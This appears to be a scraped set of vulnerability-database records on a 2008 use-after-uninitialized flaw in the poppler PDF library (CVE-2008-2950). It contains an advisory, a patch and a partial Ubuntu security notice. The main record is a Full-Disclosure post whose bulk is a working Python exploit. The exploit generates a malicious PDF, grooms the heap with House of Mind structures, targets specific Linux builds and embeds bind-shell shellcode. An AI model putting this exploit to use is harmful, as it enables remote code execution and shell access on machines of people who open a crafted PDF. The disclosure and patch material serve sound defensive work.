"2008-07-10T00:00:00", "published": "2008-07-10T00:00:00", "id": "SECURITYVULNS:VULN:9139", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:9139", "title": "libpoppler library uninitialized pointer", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:26", "bulletinFamily": "software", "description": "hi.\r\nI was in doubt about releasing this because of there is no official patch.\r\nI suppose at this point anyone could accomplish the same thing so, again\r\nI'm in doubt.\r\nA friend once told me that if in doubt take your pants off. I've already\r\ntried that and I didn't earn no resolution to my conflict so.. I thought I\r\nshould try the internet version of that strategy. 
So here we are, enjoy...\r\nf/\r\n\r\n'''\r\n#OCERT ADV\r\n#2008-007 libpoppler uninitialized pointer\r\n\r\nDescription:\r\n\r\nThe poppler PDF rendering library suffers a memory management bug which\r\nleads to arbitrary code execution.\r\n\r\nThe vulnerability is present in the Page class constructor/destructor. The\r\npageWidgets object is not initialized in the Page constructor if specific\r\nconditions are met, but it is deleted afterwards in the destructor\r\nregardless of its initialization.\r\n\r\nSpecific PDF files can be crafted which allocate arbitrary memory to\r\ntrigger the vulnerability.\r\n\r\nA new poppler version addressing the issue is scheduled to be released on\r\nJuly 30th according to maintainer.\r\n\r\nThe following patch fixes the issue:\r\n\r\ndiff --git a/poppler/Page.cc b/poppler/Page.cc\r\nindex b28a3ee..72a706b 100644\r\n--- a/poppler/Page.cc\r\n+++ b/poppler/Page.cc\r\n@@ -230,7 +230,7 @@ GBool PageAttrs::readBox(Dict *dict, char *key,\r\nPDFRectangle *box) {\r\n\r\n Page::Page(XRef *xrefA, int numA, Dict *pageDict, PageAttrs *attrsA, Form\r\n*form) {\r\n Object tmp;\r\n-\r\n+ pageWidgets = NULL; //Security fix\r\n ok = gTrue;\r\n xref = xrefA;\r\n num = numA;\r\n\r\nAffected version:\r\n\r\nPoppler <= 0.8.4\r\n\r\nFixed version:\r\n\r\nPoppler, N/A\r\n\r\nCredit: vulnerability report, patch and PoC code received from Felipe\r\nAndres Manzano <fmanzano [at] fceia [dot] unr [dot] edu [dot] ar>.\r\n\r\nCVE: CVE-2008-2950\r\nTimeline:\r\n\r\n2008-06-27: vulnerability report received\r\n2008-06-28: contacted poppler maintainers and affected vendors\r\n2008-06-30: maintainer confirms issue and patch\r\n2008-07-07: advisory release\r\n\r\nReferences:\r\n\r\nPermalink:\r\nhttp://www.ocert.org/advisories/ocert-2008-007.html\r\n\r\n\r\n####END OCERT\r\n\r\n\r\nSummary:\r\n=======\r\n\r\nThe libpoppler pdf rendering library can free uninitialized pointers,\r\nleading to arbitrary code execution. 
This vulnerability results from\r\nmemory management bugs in the Page class constructor/destructor.\r\n\r\n\r\nTechnical Description - Exploit/Concept Code:\r\n=============================================\r\n\r\nTests were performed using libpoppler util pdftotext taken from\r\ngit://git.freedesktop.org/git/poppler/poppler.\r\nOther versions were tried successfully (the ones shipped with\r\ndebian/gentoo).\r\n\r\nIn the initialization of a Page object and under certain conditions a\r\nmember object skips initialization, but then is eventually deleted. This\r\ncan be conducted to the situation in which an arbitrary pointer is\r\npassed to the libc free and so it gets appropriate for the malloc\r\nmaleficarum to enter the scene.\r\n\r\nLook at the Page class constructor on Page.cc:231. First at the beginning\r\nof the function the member object pageWidgets isn't initialized then it\r\ntries to check if the type of the annotations proposed on the pdf file\r\nare correct; if not it bails out to the label err2. Note that if some\r\ninconsistency in the type of the annotation arises the member variable\r\npageWidgets is never initialized!\r\n\r\nPage::Page(XRef *xrefA, int numA, Dict *pageDict, PageAttrs *attrsA, Form\r\n*form) {\r\n Object tmp;\r\n[...]\r\n // annotations\r\n pageDict->lookupNF("Annots", &annots);\r\n if (!(annots.isRef() || annots.isArray() || annots.isNull())) {\r\n error(-1, "Page annotations object (page %d) is wrong type (%s)",\r\n num, annots.getTypeName());\r\n annots.free();\r\n goto err2;\r\n }\r\n\r\n // forms\r\n pageWidgets = new FormPageWidgets(xrefA, this->getAnnots(&tmp),num,form);\r\n tmp.free();\r\n[...]\r\n err2:\r\n annots.initNull();\r\n err1:\r\n contents.initNull();\r\n ok = gFalse;\r\n}\r\n\r\nBut in the Page class destructor, Page.cc:309, pageWidgets is deleted\r\nwithout any consideration. 
The Page destructor is immediately called\r\nafter the erroneous Page construction.\r\n\r\nPage::~Page() {\r\n delete pageWidgets;\r\n delete attrs;\r\n annots.free();\r\n contents.free();\r\n}\r\n\r\n\r\nIt is worth mentioning that the pdf rendering scenario is friendly with\r\nthe heap massage techniques because you will find lots of ways to allocate\r\nor allocate/free memory in the already provided functionality. In the\r\nPOC I have used repeatedly the 'name' of the fields of a pdf dictionary\r\nto allocate memory. Each name allocates up to 127 bytes and apparently\r\nthere is no limit in the number of fields.\r\n\r\n\r\nThe following excerpt is a sample verification of the existence of\r\nthe problem:\r\n\r\nlocalhost expl-poppler # python poppler-exploit-rc8.py gentoo-pdftotext\r\n>test.pdf\r\nlocalhost expl-poppler # pdftotext test.pdf\r\nError: PDF file is damaged - attempting to reconstruct xref table...\r\nError: Annotation rectangle is wrong type\r\nError: Bad bounding box for annotation\r\nError: Bad bounding box for annotation\r\nError: Bad bounding box for annotation\r\nError: Bad bounding box for annotation\r\nError: Bad bounding box for annotation\r\nError: Page annotations object (page 3) is wrong type (integer)\r\nError: Page count in top-level pages object is incorrect\r\nError: Couldnt read page catalog\r\nTrace/breakpoint trap\r\n\r\n:)\r\n\r\n\r\nFurther research should be done to accommodate the heap for other\r\napplications like evince:\r\nlocalhost expl-poppler # evince test.pdf\r\n\r\n(evince:8912): GnomeUI-WARNING **: While connecting to session manager:\r\nAuthentication Rejected, reason : None of the authentication protocols\r\nspecified are supported and host-based authentication failed.\r\n\r\n** (evince:8912): WARNING **: Service registration failed.\r\n\r\n** (evince:8912): WARNING **: Did not receive a reply. 
Possible causes\r\ninclude: the remote application did not send a reply, the message bus\r\nsecurity policy blocked the reply, the reply timeout expired, or the\r\nnetwork connection was broken.\r\nError: PDF file is damaged - attempting to reconstruct xref table...\r\nError: Annotation rectangle is wrong type\r\nError: Bad bounding box for annotation\r\nError: Bad bounding box for annotation\r\nError: Bad bounding box for annotation\r\nError: Bad bounding box for annotation\r\nError: Bad bounding box for annotation\r\nError: Page annotations object (page 3) is wrong type (integer)\r\n*** glibc detected *** evince: munmap_chunk(): invalid pointer: 0x08100468\r\n***\r\n\r\nNote that 0x08100468 is still a provided pointer. But in this try some\r\nmalloc structure like _heap_info (see. house of mind) is not correctly\r\naligned any more. Maybe evince-thumbnailer which is (probably\r\nmonothreaded) is an easier target.\r\n\r\n\r\nPatch\r\n=====\r\n\r\ndiff --git a/poppler/Page.cc b/poppler/Page.cc\r\nindex b28a3ee..72a706b 100644\r\n--- a/poppler/Page.cc\r\n+++ b/poppler/Page.cc\r\n@@ -230,7 +230,7 @@ GBool PageAttrs::readBox(Dict *dict, char *key,\r\nPDFRectangle *box) {\r\n\r\n Page::Page(XRef *xrefA, int numA, Dict *pageDict, PageAttrs *attrsA, Form\r\n*form) {\r\n Object tmp;\r\n-\r\n+ pageWidgets = NULL; //Security fix\r\n ok = gTrue;\r\n xref = xrefA;\r\n num = numA;\r\n\r\n\r\nPOC:\r\n===\r\n\r\nWritten in pyploit. 
It can be used 2 ways , one selecting a preconfigured\r\ntarget like *gentoo-pdftotext* or the other in which you could pass some\r\nmalloc/free execution trace moddifing parameters.\r\n\r\n'''\r\n##########################################################################\r\n#### Felipe Andres Manzano * fmanzano@fceia.unr.edu.ar ####\r\n#### some shit on http://felipe.andres.manzano.googlepages.com/home ####\r\n##########################################################################\r\n\r\nimport struct\r\nimport struct\r\nimport math\r\nimport os\r\n\r\nimport sys\r\n\r\n## print "%.400f"%d wont work :( ... so a quick double printing class\r\nclass Doubles:\r\n def __init__(self, precision=400):\r\n self.precision=precision\r\n\r\n def pdficateint(self,i1,i2):\r\n s = struct.pack("@L",i1) + struct.pack("@L",i2)\r\n return self.pdficatestr(s)\r\n\r\n def pdficate(self,s):\r\n rslt = " "\r\n for pos in range (0,len(s)/8):\r\n rslt+=self.pdficatestr(s[(pos*8):(pos*8)+8])+" "\r\n return rslt;\r\n\r\n def pdficatestr(self, s):\r\n d = struct.unpack("d",s)[0]\r\n rslt=" "\r\n if(d<0.0):\r\n rslt+="-"\r\n d=-d\r\n rslt+="%d."%int(math.floor(d))\r\n myd=math.floor(d)\r\n scale=0.1\r\n nines=0\r\n for p in range(1,self.precision):\r\n for i in range(1,10):\r\n if (myd+scale*i) > d:\r\n i-=1\r\n break\r\n if i==9:\r\n if nines>6:\r\n return rslt\r\n else:\r\n nines+=1\r\n else:\r\n nines=0\r\n rslt+=("%02d"%i)[1]\r\n myd+=scale* i\r\n scale=scale*0.1\r\n return rslt\r\n\r\n##From Malloc maleficarum\r\n##http://packetstormsecurity.org/papers/attack/MallocMaleficarum.txt\r\nclass HouseOfMind:\r\n\r\n HEAP_MAX_SIZE=(1024*1024)\r\n JMP='\xeb'\r\n NOP='\x90'\r\n PAD='\x00'\r\n PREV_INUSE=0x1\r\n IS_MMAPPED=0x2\r\n NON_MAIN_ARENA=0x4\r\n def __init__(self, base, where, payload, entrypoint):\r\n self.base=base\r\n self.where=where-0xc\r\n self.heap_info = (base+self.HEAP_MAX_SIZE-1)& ~(self.HEAP_MAX_SIZE-1)\r\n self.payload=payload\r\n self.entrypoint=entrypoint\r\n 
self.chunkaddress=0\r\n if (self.entrypoint > 0xff - 8):\r\n throw\r\n\r\n## lendian, 32bit only\r\n## See The Malloc Maleficarum / House of Mind\r\n def mind(self):\r\n rslt = ""\r\n #first we add padding to reach the next Heap border\r\n rslt+=self.PAD*(self.heap_info-self.base)\r\n\r\n #now we add a _heap_info pinting to a malloc_state of our own\r\n #and dictating a generous size for this *heap*\r\n ##arena.c:59 //struct _heap_info\r\n rslt += struct.pack("<L", self.heap_info + 16) # Arena for this heap.\r\n rslt += struct.pack("<L", 0x0000000) # Previous heap. (BUG: Don't\r\nknow what M does with this)\r\n rslt += struct.pack("<L", 0x7000000) # Current size in bytes.\r\n rslt += struct.pack("<L", 0x7000000) # Size in bytes that has been\r\nmprotected PROT_READ|PROT_WRITE\r\n #here arena.c suggest some padding. We just don't do it.\r\n\r\n\r\n #now we add the malloc_state of our own\r\n ##malloc.c:2317 //struct malloc_state\r\n rslt += struct.pack("<L", 0x00000000) # mutex for\r\nserializing access * 0 -> unlocked.\r\n rslt += struct.pack("<L", 0x000ffff) # Flags * We need\r\nNONCONTIGUOUS_BIT to be on for passing\r\n # condition on malloc.c:@@@@@\r\n\r\n #Note: We assume not Thread's stats#\r\n\r\n rslt += struct.pack("<L", 0x00000000)*10 #Fastbins * We\r\ndon use them.\r\n rslt += struct.pack("<L", 0x00000000) #Base of the\r\ntopmost chunk--not otherwise kept in a bin\r\n #We need it to be\r\ndifferent to our\r\nchunk pointer for\r\n #passing condition\r\non malloc.c:@@@@,\r\n0 is safe enough\r\n rslt += struct.pack("<L", 0x00000000) #The remainder from\r\nthe most recent split of a small request\r\n\r\n #Here it come the bins\r\n ##The first one is the Unsorted bin!\r\n ##Free will write the *chunk* to the containing address +0xc; so it\r\n ##shout point to the GOT pointer to 'overload' -0xc\r\n rslt += struct.pack("<L", self.where);\r\n\r\n rslt += struct.pack("<L", 0x0000000)* 253 #All the other\r\nunused bins go to 0 * ~\r\n rslt += struct.pack("<L", 
0x00000000)*4 #Bitmap of\r\nbins\r\n\r\n rslt += struct.pack("<L", 0x00000000) #Linked list next\r\nmalloc_state\r\n\r\n ##Memory allocated from the system in this arena.\r\n rslt += struct.pack("<L", 0x70000000) #system_mem * Need to\r\nbe big enough for passing the\r\n #condition on malloc:@@@@\r\n rslt += struct.pack("<L", 0x00000000) #max_system_mem ??\r\n\r\n #needed for chunk aligment\r\n rslt += self.PAD*4\r\n\r\n#CHUNKS\r\n# An allocated chunk looks like this:\r\n#\r\n# chunk->\r\n+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+\r\n# | Size of previous chunk, if allocated \r\n| |\r\n# \r\n+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+\r\n# | Size of chunk, in bytes \r\n|M|P|\r\n# mem->\r\n+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+\r\n# | User data starts here... \r\n .\r\n# . \r\n .\r\n# . (malloc_usable_size() bytes) \r\n .\r\n# . \r\n |\r\n#nextchunk->\r\n+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+\r\n# | Size of chunk \r\n |\r\n# \r\n+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+\r\n\r\n\r\n #chunk 0 There isn't a single reason for this to exist *\r\nwabaaaaaaaaaa!\r\n# rslt += struct.pack("<L", 16) #Size of previous chunk *\r\nUNUSED\r\n# rslt += struct.pack("<L", 64) #Size of chunk, in bytes.\r\nNo flags\r\n# rslt += self.PAD*(64-8)\r\n\r\n #chunk 1 THE CHAMP\r\n rslt +=\r\n"\x40"+self.JMP+struct.pack("B",5+self.entrypoint)+self.PAD \r\n#Size of previous chunk *DOESN'T MATTER!\r\n rslt +=\r\nstruct.pack("<L",8+len(self.payload)|self.PREV_INUSE|self.NON_MAIN_ARENA)\r\n# Size of this chunk\r\n #TODO:\r\nExplain\r\nflags,\r\nlink\r\ncode\r\n\r\n ##Save the chunk1 address\r\n self.chunkaddress= self.base + len(rslt)\r\n rslt += self.payload #payload (payload[entrypoint] should\r\ncontain shellcode)!\r\n\r\n #chunk 2 THE LAST?\r\n rslt += struct.pack("<L",8+len(self.payload)) #Size of\r\nprevious chunk\r\n #TODO: link where\r\nit is checked\r\n\r\n rslt += 
struct.pack("<L",64|self.PREV_INUSE|self.NON_MAIN_ARENA) \r\n#Size of this chunk\r\n #Neds\r\nto\r\nbe\r\ngreater\r\nthan\r\n2\r\n*\r\nSIZE_SZ,\r\n #TODO:\r\nExplain\r\nflags,\r\nlink\r\ncode\r\n\r\n rslt += self.PAD*(64-8)\r\n\r\n #chunk 3 THE LAST!\r\n rslt += struct.pack("<L",64) #Size of previous chunk\r\n rslt += struct.pack("<L",self.PREV_INUSE) #Size of this chunk *\r\nHere we need just the PREV_INUSE bit set\r\n return rslt\r\n #no need no payload\r\n\r\n#For constructing a minimal pdf file\r\nclass PDFObject:\r\n def __init__(self,toks):\r\n self.toks=toks\r\n self.n=0\r\n self.v=0\r\n\r\n def __str__(self):\r\n s="%d %d obj\n"%(self.n,self.v)\r\n for t in self.toks:\r\n s+=t.__str__()\r\n s+="\nendobj\n"\r\n return s\r\n\r\n\r\nclass PDFDict():\r\n def __init__(self):\r\n self.dict = []\r\n\r\n def add(self,name,obj):\r\n self.dict.append((name,obj))\r\n\r\n def __str__(self):\r\n s="<<"\r\n for name,obj in self.dict:\r\n s+="/%s %s\n"%(name,obj)\r\n s+=">>"\r\n return s\r\n\r\nclass PDFName():\r\n def __init__(self,s):\r\n self.s=s\r\n def __str__(self):\r\n return "/%s"%self.s\r\n\r\nclass PDFString():\r\n def __init__(self,s):\r\n self.s=s\r\n def __str__(self):\r\n return "(%s)"%self.s\r\n\r\nclass PDFRef():\r\n def __init__(self,obj):\r\n self.obj=obj\r\n def __str__(self):\r\n return "%d %d R"%(self.obj.n,self.obj.v)\r\n\r\n\r\nclass PDFDoc():\r\n def __init__(self):\r\n self.objs=[]\r\n\r\n def add(self,obj):\r\n obj.v=0\r\n obj.n=1+len(self.objs)\r\n self.objs.append(obj)\r\n\r\n def _header(self):\r\n return "%PDF-1.5\n"\r\n\r\n def __str__(self):\r\n doc1 = "%PDF-1.5\n"\r\n xref = {}\r\n for obj in self.objs:\r\n xref[obj.n] = len(doc1)\r\n doc1=doc1+obj.__str__()\r\n posxref=len(doc1)\r\n doc1+="xref\n"\r\n doc1+="0 %d\n"%len(self.objs)\r\n doc1+="0000000000 65535 f\n"\r\n for xr in xref.keys():\r\n doc1+= "%010d %05d n\n"%(xref[xr],0)\r\n doc1+="trailer\n"\r\n trailer = PDFDict()\r\n trailer.add("Size",len(self.objs))\r\n trailer.add("Root","2 
0 R")\r\n doc1+=trailer.__str__()\r\n doc1+="\nstartxref\n%d\n"%posxref\r\n doc1+="%%EOF\n\n"\r\n\r\n return doc1\r\n\r\n#The ... "POC"\r\nclass PopplerExpl:\r\n\r\n def __init__(self,shellcode):\r\n self.shellcode=shellcode\r\n self.d = Doubles()\r\n\r\n#this wraps the shellcode in an encoding supported by 'doubles'\r\n def wrap(self,scode,where):\r\n wrapscode = '\xb8' + struct.pack("<L",where)+"\x90"*3 \r\n#movl where, %eax;nop;nop;nop\r\n for c in scode:\r\n wrapscode += "\xc6\x00%c\x40"%c \r\n#movb $c, (%eax); inc %eax\r\n if (len(scode)%2!=0):\r\n wrapscode += "\xc6\x00\xcc\x40" \r\n#movb $0xcc, (%eax); inc %eax\r\n wrapscode += "\xb8" + struct.pack("<L",where)+"\x90"*3 \r\n#movl where, %eax;nop;nop;nop\r\n wrapscode += "\x50\xc3" \r\n#push %eax;ret\r\n return wrapscode + '\x00'*(1000-len(wrapscode)) \r\n#padding to a supported size\r\n\r\n def make(self,base,got,massage=None):\r\n #here we generate the house of mind thingy\r\n #The House Of Mind instance.\r\n #Te first word es passed tu a gfree so we put 0 so we ignore that\r\nfree.\r\n hm = HouseOfMind(base, got, "\x00"*16+\r\nself.wrap(self.shellcode,base), 16)\r\n mind = hm.mind()\r\n\r\n doc = PDFDoc()\r\n doc.add(PDFObject(["<</Length 3>>\nstream...\nendstream\n"]))\r\n catalog = PDFDict()\r\n catalog.add("Type", PDFName("Catalog"))\r\n catalog.add("Outlines", "3 0 R")\r\n catalog.add("Pages", "4 0 R")\r\n catalog.add("AcroForm", "<</Fields [ 7 0 R ]>>")\r\n\r\n #for i in range(0,1000):\r\n # catalog.add( "C"*82 + "%05d"%i, 0)\r\n\r\n outlines = PDFDict()\r\n outlines.add("Type", PDFName("Outlines"))\r\n outlines.add("Count",0)\r\n\r\n pages = PDFDict()\r\n pages.add("Type", PDFName("Pages"))\r\n pages.add("Kids","[ 8 0 R 6 0 R 5 0 R ]")\r\n pages.add("Count","3")\r\n\r\n doc.add(PDFObject([catalog]))\r\n doc.add(PDFObject([outlines]))\r\n doc.add(PDFObject([pages]))\r\n\r\n page1 = PDFDict()\r\n page1.add("Type", PDFName("Page"))\r\n page1.add("Parent", "4 0 R")\r\n page1.add("MediaBox","[ 0 0 612 792 
]")\r\n page1.add("Contents", "1 0 R")\r\n page1.add("Resources", "<< /ProcSet 6 0 R >>")\r\n page1.add("Annots", "0")\r\n\r\n #malloc-fill-free lots of chunks of the size then used by Page\r\nclass(88)\r\n for pagesize in range(88,126):\r\n payload =\r\n("".join(["#%02x"%ord(struct.pack("@L",hm.chunkaddress)[i])\r\nfor i in range (0,4)]))*19\r\n payload += "B"*(pagesize-(len(payload)/3))\r\n for i in range(0,10):\r\n page1.add(payload, 0)\r\n\r\n doc.add(PDFObject([page1]))\r\n\r\n page1 = PDFDict()\r\n page1.add("Type", PDFName("Page"))\r\n page1.add("Parent", "4 0 R")\r\n page1.add("MediaBox","[ 0 0 612 792 ]")\r\n page1.add("Contents", "1 0 R")\r\n page1.add("Resources", "<< /ProcSet 6 0 R >>")\r\n page1.add("Annots", "[7 0 R 7 0 R 7 0 R 7 0 R]")\r\n\r\n #massage session 1\r\n size=127\r\n for i in range(0,massage[0]):\r\n page1.add( "A"*(size-5)+("%05d"%(i)), "B"*size)\r\n\r\n doc.add(PDFObject([page1]))\r\n annots = PDFDict()\r\n annots.add("Subtype","/Text")\r\n\r\n annots.add("BS", "<</D [ "+\r\n "0 "*massage[1] +\r\n self.d.pdficate(mind)+\r\n #more massage>?\r\n "0.0 "*massage[2] + " ]>>")\r\n\r\n annots.add("FT", "/Tx")\r\n doc.add(PDFObject([annots]))\r\n\r\n page1 = PDFDict()\r\n page1.add("Type", PDFName("Page"))\r\n page1.add("Parent", "4 0 R")\r\n page1.add("MediaBox","[ 0 0 612 792 ]")\r\n page1.add("Contents", "1 0 R")\r\n page1.add("Resources", "<< /ProcSet 6 0 R >>")\r\n page1.add("Annots", "[7 0 R]")\r\n doc.add(PDFObject([page1]))\r\n doc.add(PDFObject(["<<>>"]))\r\n doc.add(PDFObject(["[ /PDF ]"]))\r\n return doc.__str__()\r\n\r\n\r\n##Main\r\n## Not every shellcode will work by now\r\n## Only the ones that taken by 8bytes form an ieee754 double presicion float\r\n## with an exponent not too positive ... 
:)\r\n\r\n## linux_ia32_bind - LPORT=4444 Size=84 Encoder=None http://metasploit.com\r\nscode = "\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x99\x89\xe1\xcd\x80\x96"\r\nscode += "\x43\x52\x66\x68\x11\x5c\x66\x53\x89\xe1\x6a\x66\x58\x50\x51\x56"\r\nscode += "\x89\xe1\xcd\x80\xb0\x66\xd1\xe3\xcd\x80\x52\x52\x56\x43\x89\xe1"\r\nscode += "\xb0\x66\xcd\x80\x93\x6a\x02\x59\xb0\x3f\xcd\x80\x49\x79\xf9\xb0"\r\nscode += "\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53"\r\nscode += "\x89\xe1\xcd\x80"\r\n\r\n#expl = PopplerExpl( ('\xcc'+'\x90')*((160-16)/2))\r\nexpl = PopplerExpl(scode)\r\n\r\ntargets = {\r\n "gentoo-pdftotext":(0x08100000, 0x804c014, 1863, 20, 400),\r\n "debian4-pdftotext":(0x08100000, 0x804bb18, 1879, 33, 400),\r\n "gentoo-evince-thumbnailer": (0x8100000, 0x080712c4, 907, 34, 200),\r\n\r\n}\r\n\r\nif len( sys.argv )==1:\r\n print "Comments -> fmanzano@fceia.unr.edu.ar"\r\n print "Usage 1:"\r\n print " %s "%sys.argv[0], targets.keys()\r\n print "Usage 2:"\r\n print " %s massage1 massage2 massage3 base got"%sys.argv[0]\r\n print " The idea here is to align the _heap_info struct that\r\ncommences with 0x08?00010 "\r\n print " to the address 0x8?0000. For this pourpose move\r\nmassage1/2/3. "\r\n print " THIS STUPIDLY SIMPLE METHOD WOULD WORK FOR VERY FEW\r\nAPPS !"\r\n print " base is the 1024*1024 bytes aligned address to which we\r\nare trying to align everything"\r\n print " got is the addres of the got where the thing is going\r\nto write the shellcode address"\r\n print " BTW by now the shellcode is nop;int 3;nop...grooovy!..\r\nNOT"\r\nelif len( sys.argv )>2:\r\n print expl.make(int(sys.argv[4][2:],16), int(sys.argv[5][2:],16),\r\n(int(sys.argv[1]),int(sys.argv[2]),int(sys.argv[3])))\r\nelse:\r\n #base: the expected heap limit (08100000,08200000,....08f00000... 
)\r\n #got: address of the got entry to change\r\n #chinesse massage\r\n base,got,massage1,massage2,massage3 = targets[sys.argv[1]]\r\n print expl.make(base,got,(massage1,massage2,massage3))\r\n\r\n\r\n#thnks A\r\n\r\n_______________________________________________\r\nFull-Disclosure - We believe in it.\r\nCharter: http://lists.grok.org.uk/full-disclosure-charter.html\r\nHosted and sponsored by Secunia - http://secunia.com/", "modified": "2008-07-10T00:00:00", "published": "2008-07-10T00:00:00", "id": "SECURITYVULNS:DOC:20142", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20142", "title": "[Full-disclosure] #2008-007 libpoppler uninitialized pointer - POC", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:27", "bulletinFamily": "software", "description": "=========================================================== \r\nUbuntu Security Notice USN-631-1 July 28, 2008\r\npoppler vulnerability\r\nCVE-2008-2950\r\n===========================================================\r\n\r\nA security issue affects the following Ubuntu releases:\r\n\r\nUbuntu 7.10\r\nUbuntu 8.04 LTS\r\n\r\nThis advisory also applies to the corresponding versions of\r\nKubuntu, Edubuntu, and Xubuntu.\r\n\r\nThe problem can be corrected by upgrading your system to the\r\nfollowing package versions:\r\n\r\nUbuntu 7.10:\r\n libpoppler2 0.6-0ubuntu2.3\r\n\r\nUbuntu 8.04 LTS:\r\n libpoppler2 0.6.4-1ubuntu3.1\r\n\r\nIn general, a standard system upgrade is sufficient to effect the\r\nnecessary changes.\r\n\r\nDetails follow:\r\n\r\nFelipe Andres Manzano discovered that poppler did not correctly\r\ninitialize\r\ncertain page widgets. 
If a user were tricked into viewing a malicious\r\nPDF file, a remote attacker could exploit this to crash applications\r\nlinked against poppler, leading to a denial of service.\r\n\r\n\r\nUpdated packages for Ubuntu 7.10:\r\n\r\n Source archives:\r\n\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/p/poppler/poppler_0.6-0ubuntu2.3.diff.gz\r\n Size/MD5: 14304 60e84880ed135ad6962b99a2f70ece45\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/p/poppler/poppler_0.6-0ubuntu2.3.dsc\r\n Size/MD5: 1217 b0b10708006d1ebafb6429e241d226e5\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/p/poppler/poppler_0.6.orig.tar.gz\r\n Size/MD5: 1228142 96883867572aa1e55e979ec75369c562\r\n\r\n amd64 architecture (Athlon64, Opteron, EM64T Xeon):\r\n\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/p/poppler/libpoppler-dev_0.6-0ubuntu2.3_amd64.deb\r\n Size/MD5: 944416 63ce3efe8420ef87d875d0640f7f289e\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/p/poppler/libpoppler-glib-dev_0.6-0ubuntu2.3_amd64.deb\r\n Size/MD5: 157220 9edd733b20ab242a619922ead7c7847a\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/p/poppler/libpoppler-glib2_0.6-0ubuntu2.3_amd64.deb\r\n Size/MD5: 102236 d5f03ef70234c6cbfbf8a0dd7c95cf50\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/p/poppler/libpoppler-qt-dev_0.6-0ubuntu2.3_amd64.deb\r\n Size/MD5: 80938 2acc7fb66de4c697290ce9a8ab4b8307\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/p/poppler/libpoppler-qt2_0.6-0ubuntu2.3_amd64.deb\r\n Size/MD5: 73164 7dc11aed282cac586e446a955b4dc335\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/p/poppler/libpoppler-qt4-2_0.6-0ubuntu2.3_amd64.deb\r\n Size/MD5: 193558 ad541b22e629219c09de6869d39ad8c3\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/p/poppler/libpoppler-qt4-dev_0.6-0ubuntu2.3_amd64.deb\r\n Size/MD5: 232848 25241267bb5ef700d444a11c05b9c961\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/p/poppler/libpoppler2_0.6-0ubuntu2.3_amd64.deb\r\n Size/MD5: 690898 
d595084121dbe420ef93d4744e3ac4f5\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/p/poppler/poppler-utils_0.6-0ubuntu2.3_amd64.deb\r\n Size/MD5: 126224 951f2bc9b3c53c128b9121a3c6c3d66c\r\n\r\n i386 architecture (x86 compatible Intel/AMD):\r\n\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/p/poppler/libpoppler-dev_0.6-0ubuntu2.3_i386.deb\r\n Size/MD5: 887734 5eb25b39ea0c22eccd5ab4af89e4e4ed\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/p/poppler/libpoppler-glib-dev_0.6-0ubuntu2.3_i386.deb\r\n Size/MD5: 150898 e77a0a19506f8fd6e7e5fc920b5b78a4\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/p/poppler/libpoppler-glib2_0.6-0ubuntu2.3_i386.deb\r\n Size/MD5: 100076 8f1d1a787234b7d644f1a1105c7e20ef\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/p/poppler/libpoppler-qt-dev_0.6-0ubuntu2.3_i386.deb\r\n Size/MD5: 77258 7f81da7f6ae2e9fd2ac40f719d4d27e6\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/p/poppler/libpoppler-qt2_0.6-0ubuntu2.3_i386.deb\r\n Size/MD5: 72698 5ef2389b711be2cecbcf853b0b691a2e\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/p/poppler/libpoppler-qt4-2_0.6-0ubuntu2.3_i386.deb\r\n Size/MD5: 192304 aa5fec08b8f21a9e676ef7a1132b59ac\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/p/poppler/libpoppler-qt4-dev_0.6-0ubuntu2.3_i386.deb\r\n Size/MD5: 222712 b33bd5d0336c93706424f164da057c4f\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/p/poppler/libpoppler2_0.6-0ubuntu2.3_i386.deb\r\n Size/MD5: 668580 6ec4d78fd49e0adf8e068be8992b131b\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/p/poppler/poppler-utils_0.6-0ubuntu2.3_i386.deb\r\n Size/MD5: 120860 591a667e48a7ca99ed49ee01ddf86263\r\n\r\n lpia architecture (Low Power Intel Architecture):\r\n\r\n \r\nhttp://ports.ubuntu.com/pool/main/p/poppler/libpoppler-dev_0.6-0ubuntu2.3_lpia.deb\r\n Size/MD5: 904110 56b8a084f5da0ce5b483deb9145e43c8\r\n 